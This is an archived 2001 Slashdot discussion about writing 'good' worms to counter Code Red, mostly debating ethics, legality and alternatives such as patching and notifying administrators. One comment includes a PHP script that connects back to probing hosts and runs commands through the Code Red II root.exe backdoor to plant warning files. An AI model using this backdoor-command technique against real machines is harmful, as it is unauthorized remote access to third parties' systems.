Slashdot Mirror


Fight Virus With Virus?

Insanik writes "I am not an expert with internet worms like Code Red. However, I am curious if it would be possible to create a friendly worm/virus/whatever that would fight the original by using the same security holes. For instance, I read that Code Red II opens a back door. Why not have another virus that exploited the back door, closed it, then started sending itself to other servers for a certain period of time? " The submitter raises an interesting question - is this possible? I would guess so, in theory. And while we're working on Code Red, can we send a large man to the home of my latest Sircam senders and politely "ask" them to stop clicking on virii?

697 comments

  1. Correction Was:You could do that, but don't! by AndroidCat · · Score: 1

    I hope I didn't just /. those urls! :^)

    --
    One line blog. I hear that they're called Twitters now.
  2. Re:Don't be a part of the problem - Cisco fix by Koda · · Score: 2, Informative

    FYI, I have a normally reliable Cisco 675 router that was repeatedly being infected with Code Red, requiring a reboot each time. Here's the easy fix:
    1) From the "cbos#" prompt*, input the command "set web disabled". I think you'll have to follow that up with the "write" command. That shuts off the router admin web-interface. If you really must have that interface, you can change the port instead.
    2) Upgrade the CBOS to version 2.4.1. See http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml for more, and check your ISP's web site for the actual patch.

    Hope that helps...

    *Note: to get to the "cbos#" prompt, input the command "enabled" at the "cbos>" prompt.

  3. Re:It sounds like a good idea, but.. by gamorck · · Score: 0

    Wrong. You don't write a second worm. You simply write a daemon that runs on an IIS box. This daemon (part of which I have already written - just can't get it to work right) would intercept Code Red attacks and then attempt to disinfect the attacker's box using the security holes Code Red left behind. It wouldn't actually "spread" itself. It would just clean the infected boxes remotely. If enough smart people install it, Code Red is history.

    My damn code works perfectly in my test environment - but only works halfway on the net......

    Gam
    "Flame at Will"

    --
    I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
  4. Re:You'd spawn a war that hasnt escalated so far by SirSlud · · Score: 2

    This is like saying that a certain amount of rape is inevitable, so lay back and enjoy it.

    No, it's like saying a certain amount of rape does not justify raping the rapists (otherwise we could just allow rapists-to-be to get their jones off raping rapists (of their gender preference of course)). I realize that sometimes we are stuck between a rock and a hard place when dealing with miscreants, but the power to commit acts deemed illegal at the behest of authority leads to corruption - family and friends of those in charge of supervising the counter-rapes would no doubt get first shot, rape harder than the rapist did, longer .. more violently .. pick your poison, but eye-for-eye almost always leads to revenge worse than the original crime, even if it is in the name of authority.

    I support community action more than the average individual, but there is a very important distinction here: community action is only warranted when the action is to stem abuse and corruption AND the adversary does not make themselves available to a dialog; and even THEN, only if they refuse to acknowledge that a large enough opposition to their behaviour or ideals should result in change.

    I do NOT support community action to fight violence. Why? People are not responsible enough to recognize the difference between revenge and problem resolution. When it comes to the moment when you're smashing the bat over some dissident's head, you're probably not thinking about whether or not said dissident will continue their actions (in this case, continue writing bad viruses), but rather how much the dissident had this coming to them. And since you've lost sight of the goal, no resolution is likely to come from it. Same goes with white hat viruses .. sure, some of the viruses will help fight malicious ones, but after a while, it will be difficult to tell just who the white and black hats are. Never mind that the popularization of viruses for the cause of 'good' will start masquerading about for various personal causes; ie, the 'good' virus that only attacks 'hell-bound' porn sites, or 'good' viruses that only attack sites which endorse gay rights. (Well, of course, these types of attacks and viruses already exist, but legitimizing the distribution of viruses would only allow these authors to claim they are writing 'good' viruses.)

    All this is notwithstanding the fact that you'd raise awareness of how to write viruses (I'd imagine you could easily publish a book "How to get into an IIS server, and spread .. for good."), nor figure in the cost of 'good' viruses written improperly, and subsequently causing as much damage as the 'bad' viruses they seek to purge.

    Unfortunately, mentalities like yours seem to prevail. People lack the tolerance and foresight to see that sometimes the eye-for-eye cure, no matter how self-satisfying, can cause the problem to reach levels of magnitude far beyond that which it would have reached had resolutions been sought IN OTHER WAYS.

    Incidentally, there is someone on our street with cracked windows. Despite this, everyone else seems content to continue to take pride in the appearance of their dwelling; the lawns are mowed, and the flower beds are gorgeous. If the motivation for behaviour was whatever the lowest common denominator was, we'd have never gotten out of the stone age. I should hope that the sole motivator for maintaining some sense of responsibility, dignity, and self-control is not that others HAVE to do it too. I could list hundreds of examples, from jaywalking to litter, in which the only reason they haven't reached catastrophic levels is because SOME people take it upon themselves not to contribute to the problem, even if there is little chance of being punished or caught. Even if littering and jaywalking were legal, I'm positive a significant portion of the population would continue respecting others' environment and traffic flow.

    And please notice I never once suggested we 'lay back and enjoy it', although I suppose drawing judgemental conclusions out of posts has long since become a /. tradition. I'm just saying, there are other ways to fight viruses .. such as forcing a certain software maker to fix the pieces of swiss cheese they call web servers and mail clients, or condemning friends and family for not practicing caution when being online.

    --
    "Old man yells at systemd"
  5. While it seems like a good idea... by the_ph0x` · · Score: 1

    ... and fun for the entire family no less.

    Think of the added bandwidth usage that would cause - conceivably doubling or tripling the amount of wasted line volume. Just download more pr0n ... it's better in the long run.

    .ph0x

    --

    ---
    ps -aux | grep mind
  6. Why is it a bad idea? by dave-fu · · Score: 1

    I'm not sure which you're talking about. Blackholing port 80 isn't a bad idea short-term, but running with the assumption that sooner or later, it'll be opened back up, while insane amounts of traffic may not come with it, there's still a small matter of rooted boxes out there that people haven't fixed, which present a big problem: their ISPs should block traffic to their webserver based on the rooting and send them an e-mail indicating as such.
    Why's a "good worm" a bad idea? Something about it being untested, something about it whoring up bandwidth on its own, something about it being as much of an unknown quantity as the worm it purports to fix, you know. Like that.

    --
    Easy does it!
  7. A nice thought.... by trazom28 · · Score: 1

    This has some merit, as far as what it would intend to do - go out and fix stuff, making the world a more secure place. (here it comes...) But.... it opens up way too many cans of worms (no pun intended) as far as privacy issues and such. For example, I don't want some unknown worm of some sort poking at my web server. I want *me* poking at it, knowing what's going on with it, etc. If I go to run a patch, and suddenly it says "this patch has already been run" I wanna know why, and how, and who. Also, it comes down to the fact that sysadmins can't be lazy. I've seen so many, many "tech ppl" who think they have a clue, think that all they need to do is install a few things, and they're gods. They forget the second half.. the *work* part of their job.. where they have to go out, get patches, keep up to date, be PRO-active to problems and potential problems. My thought on that is, maybe if a few systems get infected, it might wake up some of these techs and get them to motivate their collective butts to get themselves patched. If they don't, it's nobody's fault but theirs.. the patches have been out for months.

    --
    {} ------ When I think of a good sig, I'll put it here
    1. Re:A nice thought.... by Anonymous Coward · · Score: 0

      While there is work to be done, you can work smarter. If you had 100 servers to patch of different flavors, keeping up with all their patches and making sure they get patched would be a nightmare. That is why often times people will use things like rsync or HP OpenView to automate the distribution of patches. Now, as I posted earlier, if someone was to make a controllable worm, that only worked on a certain set of machines or subnets, then I think that would be OK. Then the admin himself could launch this thing on his own machines.

    2. Re:A nice thought.... by Anonymous Coward · · Score: 0

      The problem is that most of these systems were hacked because they have no Administrator. A lot of the attacks I have seen have come from (probably cracked) beta versions of Win 2K. If someone is still running a beta version of Win 2K, it's a good bet that they haven't upgraded in a while and they probably won't. Odds are, these people don't even know that they are running IIS, so how would they know to patch it? Now, I hate those stupid auto-update programs that Microsoft runs all the time so that Administrators don't have to administrate... But in today's Microsoft era, when people expect their OS to be self administering, how do we keep people's ignorance from endangering others? I am reminded of drivers licenses. If someone can't prove that they are able to drive without endangering others, then they can't drive. So how can we do this with the Internet? How can we tell someone "Sorry, you can't run a server, because you can't keep it patched against viri(sp?)".

  8. Re:Its entirely possible by Tassach · · Score: 3, Informative
    Plus, lawyers have to be careful about what they say in a forum like this -- a lawyer cannot give "official" legal advice to someone who is not his or her client. This is why any legitimate law-related web site has a disclaimer like "this is not to be construed as legal advice".

    --
    Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
  9. Best friendly virus that does no harm: by tcc · · Score: 2

    My approach would be educate in a real-world situation. If someone has too much time on his hands and wants to do this, well here's a suggestion:

    Lock the screen in black, disable ctrl-alt-delete on any OS, and type this a bit below average reading speed in white:

    "Boo... I'm a virus, you know what you did was really dumb?... You're lucky this time, you will lose no data, I won't send anything critical by email without your knowledge, and your operating system will stay intact... in exchange you'll have to bear with this message for a few minutes.

    Clicking on attachments in your email when you don't even know where it comes from = Stupid.

    Clicking on attachments of which you don't even know the extension = Dumb.

    Opening a file that you don't know about in your [download] directory = Asking for trouble

    Did you know that running an operating system without updated antivirus file, or without antivirus at all is bad when you're a rookie? (you ARE a rookie since you are reading this, please don't consider yourself bright or IT-man 2001 because if you ARE actually working in IT, you're even dumber than a rock, reason #1? a rock wouldn't catch this virus)

    If you typed CTRL-ALT-DELETE anytime while this was displayed, you deserve to be wiped and bitchslapped you selfish log, if you don't care about the damages you can get, think about the damages you can create by spreading your stupidity?

    Now find a way to remove me, else I'm gonna repeat this every xx minutes, and in the end, I might actually end up doing something bad.

    Regards, retard!"

    howzat? :)

    --
    --- Metamoderating abusive downgraders since my 300th post.
  10. Re:I Hope You Keep Bail Money Near Your Gun by operagost · · Score: 1
    Who are the people with the power? WE, THE PEOPLE OF THE UNITED STATES. That, my friend, is the first line of the Constitution, THE basis for federal law. It continues, "... in order to form a more perfect union, establish justice, insure domestic tranquility, provide for the common defense, promote the general welfare, and secure the blessings of liberty to ourselves and our posterity, do ordain and establish this Constitution for the United States of America."

    Emphasis mine, of course. Patrick Henry summed it up, but the Constitution spells it out.

    Thanks for taking my bait.

    --

    Gamingmuseum.com: Give your 3D accelerator a rest.
  11. Sircam, the Voyeurs virus. by irqzero · · Score: 1

    Sadly I haven't gotten many of these virii mails, however when I do, I always |strings (just like with any word doc). It's interesting what you end up finding.
    According to a friend of mine, a SirCam infected PC in his HR dept sent out an excel spreadsheet with employee salaries. Yippeee!

    --
    this space intentionally left blank
  12. "Cheese" worm? by meisenst · · Score: 1

    Haven't we seen this already with the Cheese worm? It attempted to fix broken Linux systems and repair damage done by other worms.

    IIRC, people didn't appreciate it, and noted so in the Slashdot article about the worm (found here).

    Why would this be any different?

    (not that I'd seriously mind having some of my work done for me, but hey... I don't want people playing around on my machines, regardless of why they're doing it)

    meisenst
    --
    Green's Law of Debate: Anything is possible if you don't know what you're talking about.
  13. works until.... by metalhed77 · · Score: 2, Insightful

    you have about 600 anti-virus viruses on your server you don't know about, some of which were poorly written, leaving the admin to weed out the cpu hogging, mem leaking, anti-virus viruses.

    --
    Photos.
    1. Re:works until.... by WNight · · Score: 2

      Better the admin has to reinstall the OS (trust me, MS admins are GOOD at that!) after it becomes slow and boggy from too many patches, than after some kiddy r00ts it, DDoSes with it, and formats the drive, taking out any data they might have had on it.

      After all, either way they've got to clean up, the easiest way to clean an MS system from an unknown problem is to reinstall and download all the updates. One way they do it because the machine is a bit slow or unstable, run of the mill for a windows server, the other way they do it after contributing to potentially millions of dollars of 'damages' (usually lost sales) at some target site.

  14. Re:Why not put up a webpage that people can use? by jpostel · · Score: 1

    I have often thought about the countersuit idea. It would not be criminal court though. You would be in criminal court. It would only work if there were some law about negligence or criminal facilitation, but you would have to prove that they knew their server was hacked and failed to take actions to fix it.

    --
    Ummm, Jon, aren't you supposed to be dead...? - Otter(3800)
  15. Re:IIS = Loaded Gun? by j_w_d · · Score: 1
    God, Im so pissed off now that I could fucking strangle a fucking poodle and throw it in traffic, except that if I am in California the damn liberals there would just throw me in jail. Now Im pissed off and I don't have any creative outlet other than to take it out on some sorry ass linux zealot. I'd punch you in the face but I don't want your god damn zits to pop all over me thus coating me in layer of thin

    Is it possible you accidentally left your sense of humour and response to irony in your other pants?

    --
    ------ The only greater hazard to your liberty than n politicians is n+1 politicians.
  16. Re:Its entirely possible by Shoten · · Score: 3, Interesting
    A case cannot be made for self-defense, and here is why.

    If you are in a dark alley somewhere, and there is one other person, and he draws a gun on you, indicates an intent to harm you, you have the right to use your weapon ONLY IF that is your last resort. And I won't even go into the notion of the "danger to life and limb" that is present in that scenario, but suffice it to say that generally speaking, you can do things you can't otherwise get away with if it's for the purpose of saving a life.

    When it comes to your web server, nobody's going to die if you get defaced, rooted, bent over, etc. It costs some money to fix, ok, but that does not give you carte blanche to break the law at a similar level. Keep in mind that nearly every law that outlaws hacking is based on "unauthorized access." It doesn't matter WHY you're doing it, just that you know you're not supposed to be there. And if you're basing your code upon a notorious worm...well...good luck trying to say "I didn't know!" :)

    Final point, you have other options. Keep up with your patches. Install IDS and watch the logs. Yes, this takes work, but so does writing a counter-worm every time a new worm comes out, and at least this way you can be protected BEFORE it hits, not after. And if all those Code Red-nailed boxen are knocking any of your systems offline, I gotta tell ya, you need to do something about your network, because as severe as the scanning is, I haven't heard from a single client who has actually had downtime from it.

    --

    For your security, this post has been encrypted with ROT-13, twice.
  17. Re:This has already happened by Anonymous Coward · · Score: 1, Interesting

    One example of something similar is the "noped" virus, which scans for child pornography and then emails any suspect files to law enforcement authorities. A good description on the possible legal implications is located here http://www.infosecuritymag.com/digest/2001/05-31-01.shtml

  18. Re:Great business plan. by shippo · · Score: 1
    Something like this has just come up at work here. A customer that runs NT all over wants us to send someone to their office at the other end of the country just to install the IIS fixes to one machine.

    It amazes me that someone of their nature (a major name) hasn't got anyone competent on site to install this FIX.

    Then again, judging by the fact that their standard FIX to performance problems on a Solaris machine was to reboot it, I'm surprised that anything works at all.

  19. A Case for self defense? by Snowbeam · · Score: 1

    I am not a lawyer, so please take what I say with a grain of salt (Maybe more).

    If your local machine were to have the equivalent of a self defense mechanism, that responded only to direct attacks by other machines, that's one thing. With such a system your machine is limited to warning the attacking system before using minimal resources to defend itself.

    On the other hand, if your machine is actively seeking to modify an attacking system, by patching it, destroying it or otherwise, one would say you've gone beyond self defense and are an active participant in malicious intentions.

    Causing another machine to be patched and then to still attack another system simply to patch it up seems like a grand idea, but the root problem remains, and you've simply added to it. Legally, I believe, this would be called an illegal act (remember grain of salt).

    --
    I am Lord Snowbeam. Heed my call!
  20. But you'd get sued by...[Re:Its entirely possible] by gmatyola · · Score: 1

    Microsoft... because if you downloaded their 'official' IIS patch from their website, they MAKE you agree to run this code on one and only one licenced PC... And they WOULD probably sue you on principle. Then patent your proactive updating technology for Windows XP.

  21. Re:Its entirely possible by HiTechRedneck · · Score: 1

    Yes, but the server you are responding against is not the attacker... it is a victim of the worm. That's like shooting the hostage and the attacker to defend yourself... That doesn't seem right to me. That is a bit different though considering you are not causing damage to the "hostage" machine, but you would be trespassing since you did not get permission from the owner to fix the problem.

  22. Re:Possible? Yes, of course. by AndroidCat · · Score: 1

    Come to think of it, I like the name "Code Raid" better -- Kills those bugs and worms dead!

    --
    One line blog. I hear that they're called Twitters now.
  23. Re:Its entirely possible by aengblom · · Score: 0, Redundant

    In this case, you would be shooting at every gun owning or potential gun owning person you come across. This is generally frowned upon.

    --


    So close and yet so far from the world's perfect ID number
  24. Re:The law's not on your side by acidrain · · Score: 2, Interesting

    What about just disabling the virus as a response to the scan? As Code Red boxes advertise themselves as infected and vulnerable, you don't need to probe the net for infected/vulnerable computers. Besides, releasing _any_ scan-and-infect worm on the net is a bad idea.

    Is automatically patching someones box for them (as compared to infecting it) a valid form of self defence? I can't see being sued for it.

    If you wanted to go a little further overboard, you could install a defensive-response worm in response to an attack. It would only spread as far as the original infection and place minimal load on the net.

    --
    -- http://thegirlorthecar.com funny dating game for guys
  25. what if ... by operagost · · Score: 1

    I made a virus that installs Apache on the system? That would do the trick.

    --

    Gamingmuseum.com: Give your 3D accelerator a rest.
  26. Re:Goatse.cx virus! by CakerX · · Score: 1

    now THERE is something to get cracking at, for all of those who didn't know, there are certain fellows who take goatse.cx as a religion, boy would they be happy to see it spread!!!, not only is goatse a nasty image, it has also grown to be a symbol of internet counterculture.

  27. Re:Its entirely possible by jeremyp · · Score: 1

    I think you have a right to point a gun at them. Whether you have the right to pull the trigger depends on their reaction (if they have a lethal weapon of their own, then maybe you shouldn't wait for a reaction). If your gun causes them to run away and you still shoot them, I say that makes you a murderer.

    --
    All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
  28. Re:Citizen's Arrest by Kenyaman · · Score: 1

    You can't sue someone because somebody misuses their product. If I kill your puppy by putting drain cleaner in his food dish, you can't sue the drain cleaner manufacturer.

    I think Microsoft would be safe. This is clearly not the intended use of their product.

  29. Re:It sounds good in theory... by krogoth · · Score: 1

    Here's a safe alternative: make this PHP script 'default.ida' and configure Apache appropriately. It places a warning in c:\, c:\my documents, c:\winnt\start menu\programs\startup and c:\winnt\desktop (trying to have everyone covered). It then logs the requests so you can email the administrators. (You will need to remove the extra spaces added by slash)
    <?php
    header("HTTP/1.0 400 You appear to be infected");
    ?>
    <html>
    <head><title>Red Alert</title></head>
    <body>
    <?php
    // The address that just hit us; read from $_SERVER, since the bare
    // $REMOTE_ADDR only existed with register_globals on.
    $remote = $_SERVER['REMOTE_ADDR'];
    $res = '';
    $fp = fsockopen($remote, 80, $en, $es, 5);
    if (!$fp)
    {
        echo "I tried to warn you, but couldn't connect: $es ($en)";
    }
    else
    {
        fputs($fp, "GET /scripts/root.exe?/c+echo+Danger:+you+are+infected+with+code+red+2.+Please+go+to+http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800+>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+echo+For+windows+NT4+use+http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833+or+to+prevent+future+worms+either+turn+off+IIS+or+go+to>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+echo+http://www.apache.org+for+a+real+server.+You+can+contact+me+at+MYEMAILADDRESS+This+is+an+automatic+warning+system+that+sends>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+echo+you+this+warning+when+your+server+attacks+mine+(of+course,+I+use+a+server+that+isnt+vulnerable+to+so+many+attacks),+so+this+message+was>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+echo+triggered+when+my+server+was+attacked.>>+c:\\aviruswarning.txt HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c:\\docume~1\\Administrator\\mydocu~1 HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c:\\docume~1\\Administrator\\desktop HTTP/1.0\r\n\r\n");
        fputs($fp, "GET /scripts/root.exe?/c+copy+c:\\aviruswarning.txt+c:\\docume~1\\Administrator\\startm~1\\programs\\startup HTTP/1.0\r\n\r\n");
        echo "I tried to warn you, and the server started to say:<h2>";
        $res = fgets($fp, 1024);
        // Never echo a remote host's reply into our page unescaped.
        echo htmlspecialchars($res);
        fclose($fp);
    }
    // One log line per request: source address, timestamp, first line of the reply (if any).
    $log = fopen("/var/htdocs/logging/redalert.log", "a");
    fwrite($log, $remote . " " . date("r") . " " . trim($res) . "\n");
    fclose($log);
    echo "</h2> " . ($_SERVER['SERVER_SIGNATURE'] ?? '');
    ?>
    </body>
    </html>

    --

    They that quote Benjamin Franklin on liberty and safety deserve neither.
  30. Re:Don't be a part of the problem by Ctrl-Z · · Score: 2, Informative

    The problem -- as many knowledgeable folks have already reported -- is that admins are reluctant to update production servers, because of the fact that such updates can and do break those systems.

    Do you really want to rely on Microsoft's updates to be reliable and correct? Updates are best installed on test servers and then migrated to production systems. The fact is that once an exploit is discovered, it typically takes several months for destructive software to be released that takes advantage of the exploit. Code Red came out much quicker and that has caused many of the problems we are witnessing.

    --
    www.timcoleman.com is a total waste of your time. Never go there.
  31. Send a bill to Microsoft by Anonymous Coward · · Score: 0

    It is unlikely that you will ever be able to collect damages from Microsoft due to its negligently written, destructive products. But why not send Billy-boy a bill for the repairs anyway?

  32. Re:Why not? by Anonymvs+Cowardvs · · Score: 1

    How could it be a problem? It could have a bug.

    Remember, this thing would be entirely out of your hands once it started propagating. Keeping in mind that programmers are human, consider what would happen if something went wrong along the way. I mean, even RTM found that his worm didn't do what he expected.

    Also, imagine what would happen if someone used your worm with a malevolent payload. We're talking seriously bad publicity.

  33. Re:again together by Iffy+Bonzoolie · · Score: 1

    Hell, yes! I'd take Alexander the Great over Napoleon any day. I'd take Napoleon over Hitler any day.

    --
    Run a pencil-and-paper RPG campaign with your far-off friends: Gametable!
  34. Re:I've done some of this by hubbabubba · · Score: 1
    You're partly wrong about CR2 infected machines DoSing themselves. CR2 spawns 300 threads that do in fact overload smaller boxes. On more robust servers, though, the box is capable of running those threads and accepting root.exe? requests. Whether or not a machine can handle both has nothing whatever to do with "reinfections" (huh?). Also, if the box doesn't crash altogether or get fixed, the worm goes to sleep in 24 or 48 hrs, at which point it is wide open. Try going back through your list of IPs that were "busy" and you should find plenty of interesting stuff.....er.... theoretically at least.

    hubbabubba

    And don't call me no sigless wonder dangit!

    --
    Fried ice cream is a reality. - George Clinton
  35. Re:IIS = Loaded Gun? by BigBlockMopar · · Score: 2

    Is it possible you accidentally left your sense of humour and response to irony in your other pants?

    He probably hates me because he's not circumcised. [grin] With my .sig, I get irrational stuff like that every now and then.

    --
    Fire and Meat. Yummy.
  36. Re:Why do favors? by Anonymous Coward · · Score: 1, Insightful

    This is such a typical response from a slashdotter. Fine, so these people are using Microsoft, but like it or not there are a bunch of servers that you probably hit all the time that run on IIS. What really pisses me off about this site sometimes is how quick people are to say "screw you" to anything that has to do with Microsoft. I dislike them as much as the next person, but just like all other debates, to each their own. How about we all get to together and help each other instead of constantly ranting about how much 'their' stuff sucks. And if possible, I think the idea of the 'good' worm would be great. Only I doubt the IT people out there would want some random worm playing around with their stuff.

  37. Re:Citizen's Arrest by GreyPoopon · · Score: 2

    How about instead just writing a program that sends e-mail to the offending system every time it makes an attempt to infect your system. That way, you're only notifying them of the problem (each and every time it occurs), and they'll be obliged to do something about it before their e-mail logs fill up.

    --

    GreyPoopon
    --
    Why is it I can write insightful comments but can't come up with a clever signature?

  38. And Open a Can of Worms? by B.B.Wolf · · Score: 1

    Nuf sed!

  39. Re:Heh by Oriumpor · · Score: 1

    who says anyone doing this would have to announce that they did it? why not just go ahead and post it in some warez and let some script kiddie propagate it... and post the source for people to see how insanely easy it was to do it

  40. Re:I Hope You Keep Bail Money Near Your Gun by Anonymous Coward · · Score: 0
    rape your wife after he picks up the good stuff?

    Ah, yes. The good old "they're here to take our women!". And just how many burglars do that?

    I have the right to self defense

    Yes. After he/she attacks you. Attack on your property is not enough. Or do you think your wife is your property?

  41. Source? by SimplyCosmic · · Score: 1
    Could you please make this available for those of us with less than stellar Perl scripting skills?

    Thanks!

    1. Re:Source? by FatOldGoth · · Score: 2

      Hey, who said my Perl skills were anything other than sub-stellar? That's the nice thing about Perl - you don't have to be any damn good to write useful little bits of code. :)

      I'm trying to arrange for space on a relatively /. proof server right now and should be able to post an easily hackable version of the script there soon. I'll post the URL when it's sorted.

      --

      I would be a paid subscriber if Taco and Hemos weren't such cunts
    2. Re:Source? by jsanglier · · Score: 1

      Since I pay for the server that this script is now parked on, I am ducking for cover!

      --
      Wurm Online - the independent MMO - http://www.wurmonline.com
    3. Re:Source? by FatOldGoth · · Score: 2

      As promised.

      They're a bit rough and ready, and will require some customisation and possibly a minor bit of hacking. I've put a few comments in to make that easier, though. Good luck!

      --

      I would be a paid subscriber if Taco and Hemos weren't such cunts
    4. Re:Source? by DraKKon · · Score: 1

      how about this (made a few changes to your script; modified code at http://unearthed.com/email_codered.txt):

      An analysis of our web server logs has shown that
      Host: $host

      on

      IP address: $address

      scanned us between ${targethour}:00 and ${targethour}:59 BST on $targetday of $month_name[$targetmonth] in a manner that suggests infection by a variant of the Code Red worm.

      This is an automatic notification that makes an educated guess at email addresses of responsible parties. If you are not responsible for this host, please ignore this message and accept my apology for the waste of your time and bandwidth. If you do know who is responsible for this host, I would be grateful if you could pass this notification on to them.

      If you are responsible for this host, you will probably want to patch it as soon as possible, as it is a severe security risk to your organisation.

      If this is an ISP that sells DSL or Cable Modem access, please shut off the offending IP Address's access to the internet. This way they will call Technical Support and then you can advise them that they are infected with the Code Red Worm and they need to patch their system. A headache for the user, but a godsend for the unaffected.

      Details of the procedure for patching the server can be found at:

      http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/news/nt4srp.asp

      Thank you for your time.

      - $yourname

      --
      "It's not like your minds are as open as the source you love..." - Me to the majority of Slashdot.
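    The notification script itself was never posted in this thread, only its e-mail template. The following is an added example (not DraKKon's or FatOldGoth's code) of the defensive half of that idea: scan a web server access log for Code Red style probes, group them by source address and clock hour, and fill in the notice quoted above. The log lines, the reverse-DNS table and the `FILLER` query string are constructed for the example; a real run would resolve hostnames with `socket.gethostbyaddr()` and feed the rendered text to a mailer.

```python
"""Find Code Red style probes in an access log and render the notice from the thread.
Added example; the log lines and hostname table are constructed, not real traffic."""
import re
from collections import defaultdict
from datetime import datetime

# A worm probe asks for /default.ida with a query made of one byte repeated many
# times.  FILLER stands in for that run; the real overflow payload is not reproduced.
FILLER_X = "X" * 64
FILLER_N = "N" * 64

# Constructed sample log in Common Log Format (Apache-style; IIS logs would need another parser).
SAMPLE_LOG = "\n".join([
    f'192.0.2.45 - - [06/Aug/2001:14:02:11 +0100] "GET /default.ida?{FILLER_X} HTTP/1.0" 404 302',
    f'192.0.2.45 - - [06/Aug/2001:14:07:53 +0100] "GET /default.ida?{FILLER_X} HTTP/1.0" 404 302',
    '198.51.100.9 - - [06/Aug/2001:15:30:00 +0100] "GET /index.html HTTP/1.1" 200 1843',
    f'198.51.100.9 - - [06/Aug/2001:15:31:02 +0100] "GET /default.ida?{FILLER_N} HTTP/1.0" 404 302',
    # Bare /default.ida with no payload: a curious human or a scanner, not a worm.
    '203.0.113.7 - - [06/Aug/2001:15:40:10 +0100] "GET /default.ida HTTP/1.1" 404 302',
])

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# At least 50 copies of the same letter right after "/default.ida?".
PROBE_RE = re.compile(r'^/default\.ida\?([A-Za-z])\1{49,}')

# Placeholder reverse-DNS table for the constructed addresses (assumption, not real hosts).
HOSTNAMES = {"192.0.2.45": "dsl-45.example.net", "198.51.100.9": "host9.example.org"}

NOTICE = """\
An analysis of our web server logs has shown that
Host: {host}
on
IP address: {address}
scanned us {count} time(s) between {targethour:02d}:00 and {targethour:02d}:59 (UTC{tz}) on {targetday} {month_name}
in a manner that suggests infection by a variant of the Code Red worm.

If you are responsible for this host, you will probably want to patch it as
soon as possible, as it is a severe security risk to your organisation.

- {yourname}
"""


def parse_clf(line):
    """Return the fields of one Common Log Format line, or None if it does not parse."""
    m = CLF_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_codered_probe(path):
    """True only for /default.ida requests carrying the long repeated-byte query."""
    return PROBE_RE.match(path) is not None


def find_probes(log_text):
    """Count probes per (source IP, clock hour); the hour is the window the notice names."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec and is_codered_probe(rec["path"]):
            hits[(rec["ip"], rec["ts"].replace(minute=0, second=0))] += 1
    return dict(hits)


def notices(log_text, yourname):
    """Render one notice per (address, hour) window, ordered by address then time."""
    out = []
    for (address, window), count in sorted(find_probes(log_text).items()):
        out.append(NOTICE.format(
            host=HOSTNAMES.get(address, "(no reverse DNS entry)"),
            address=address, count=count,
            targethour=window.hour, targetday=window.day,
            month_name=window.strftime("%B"), tz=window.strftime("%z"),
            yourname=yourname))
    return out


if __name__ == "__main__":
    for text in notices(SAMPLE_LOG, "example admin"):
        print(text)
```

The probe test deliberately ignores a bare `/default.ida` request: only the long filler query marks a worm, so a person poking at the URL by hand is not mailed a false accusation.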
  42. Re:Don't be a part of the problem by blakestah · · Score: 2

    In other words, what you do may be ethical, that doesn't make it legal. Using the same methods as a virus to gain access to someone's computer is not legal. It doesn't matter if you are trying to defend against a virus, it's still illegal.

    Criminal law guarantees you a trial by your peers. It is not illegal if your peers will not convict you. Here is an example: I knew a fellow in San Francisco who got AIDS as a long-time drug user. He nearly withered away and died. He started smoking pot at the advice of his physician even though it was illegal at the time. He was arrested numerous times, but never convicted of smoking pot.

    You see, a jury of San Franciscans will NEVER convict someone with AIDS of smoking pot to boost their appetite. My friend gained a lot of weight and probably lived another 2 years as a result of pot smoking.

    In the case of CodeRed anti-virii, you would need to have a reasonable argument that your actions were justified as bettering society on the whole. If you don't think such an argument exists, I wouldn't recommend writing it :)

  43. Re:Don't be a part of the problem by blakestah · · Score: 2

    Your analogies aren't valid, because you're talking about cases where there is the threat of physical harm to an actual person. The Code Red virus is annoying, and it's causing major problems, but it's not going to kill anyone, and it's not going to permanently damage your system.

    I disagree. CodeRedII is going to permanently damage your system. It is the equivalent of AIDS for computers - it completely knocks out your defenses, but doesn't cause any harm itself.

    People with AIDS do not live very long. Neither will computers with CodeRedII. They are remote-rooted by anyone accessing the httpd port.

    Also, you neglect to make an analogy between financial harm and physical harm, perhaps on purpose. Both are justifiable legally.

    If you attack someone else's machine, then you're on exactly the same ethical level as the person who wrote the original virus.

    THAT is a flawed analogy. Whereas it may not be appropriate to kill someone for committing murder, using an anti-virus to shut off machines with CodeRedII is completely different. The machines are compromised and vulnerable.

    Imagine you are a business owner, and someone came along, opened the doors to your store, didn't take anything, and left. Are you trying to claim it would be illegal for me to close the door, and place me on the same level as the first person who opened the doors ?????

    If you do believe that, please put down the crack pipe and back away slowly.

  44. Can't do that, didn't you read the patent news? by Anonymous Coward · · Score: 0

    Some antivirus company just patented that, so you'd be sued as soon as you put it up.

  45. Re:Its entirely possible by Swaffs · · Score: 1

    The self defence point is a good one. I wonder if it would change the legality of it depending on how it's executed. If you were to set up a script that would clean any machine that asked for default.ida off yours, then is it still illegal? You're not going out and actively searching for and patching servers, you're just hosting a file on your webserver, and if someone else requests that file from you, then it's their problem what happens as a result. This passive approach just might be legal. This is all gross assumption however, since IANAL.

    --

    --
